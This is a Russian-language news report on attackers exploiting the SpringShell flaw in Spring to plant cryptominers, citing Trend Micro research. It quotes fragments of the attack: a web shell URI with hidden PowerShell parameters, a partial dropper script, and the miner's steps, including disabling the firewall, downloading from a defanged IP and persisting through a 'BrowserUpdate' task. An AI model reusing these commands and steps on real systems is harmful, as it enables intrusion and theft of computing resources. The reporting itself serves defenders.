Тысячи попыток взлома были предприняты в течение нескольких дней после обнаружения уязвимости.
Злоумышленники атакуют серверы, используя недавно обнаруженную уязвимость SpringShell, пытаясь установить вредоносное ПО для майнинга криптовалют, сообщают исследователи.
Об уязвимости SpringShell стало известно в конце прошлого месяца, когда спец-безопасник продемонстрировал, как она может быть использована для удаленного выполнения вредоносного кода на серверах, которые запускают приложения Spring model-view-controller или WebFlux поверх Java Development Kit версии 9 или выше.
Spring является наиболее используемым Java-фреймворком для разработки приложений корпоративного уровня на Java. Эта платформа является частью разветвленной экосистемы, которая предоставляет инструменты для облачных приложений, приложений для работы с данными и приложений для обеспечения безопасности.
Ранее компания Trend Micro, специализирующаяся на безопасности, сообщила, что заметила участившие попытки проникновения "внутрь" систем. С 1 по 12 апреля исследователи компании регистрировали в среднем около 700 попыток в день использовать уязвимость для установки криптомайнинга. Запустив вредоносное ПО на мощных корпоративных серверах, преступники могут добывать биткоин или другие виды цифровых денег, используя ресурсы и электричество невольной жертвы.
Число попыток использования уязвимости достигло пика 3 апреля и составило почти 3 000.
Сначала хакеры отправляли команды, которые должны были определить, работают ли уязвимые серверы под управлением Windows или Linux. Затем они запускали код эксплойта, который пытался установить тип интерфейса, известный как web shell, который позволяет удаленному пользователю выполнять команды с помощью веб-окна.
URI, соответствующий закодированному эксплойту, выглядел следующим образом: веб-оболочка - "zbc0fb.jsp", а параметры w и l означают полезную нагрузку для Windows и Linux, закодированную в Base64.
/zbc0fb.jsp?w=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+ &l=echo+
Затем сценарий powershell пытался загрузить криптовалютный майнер и выполнить его.
$cc="http://"
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="$env:AppData\$sys.exe"
Поток выполнения выглядел следующим образом:
1. Брандмауэр отключается с помощью утилиты netsh.
2. Останавливаются или уничтожаются другие известные криптовалютные майнеры, такие как kthreaddi, sysrv и sysrv012.
3. Останавливаются другие запущенные процессы, прослушивающие порты 3333, 4444, 5555, 7777 и 9000.
4. Если процесс kthreaddk не существует, криптовалютный майнер загружает двоичный файл sys.exe с адреса 194[.]145[.]227[.]21 на адрес C:\Users\\\AppData\Roaming\.exe.
5. Затем криптовалютный майнер запускает процесс со скрытым окном, чтобы пользователь не видел визуальных намеков на выполняемый процесс.
6. Позже создается запланированное задание с именем "BrowserUpdate", которое запускается каждую минуту. Кроме того, ключ запуска Windows модифицируется для запуска двоичного файла sys.exe.
Исследователи Trend Micro не знают, сколько попыток эксплойта были успешными, если таковые вообще были. Но советуют всем, кто использует приложения Spring model-view-controller или WebFlux на JDK версии 9 или выше, следует как можно скорее исправить этот недостаток.
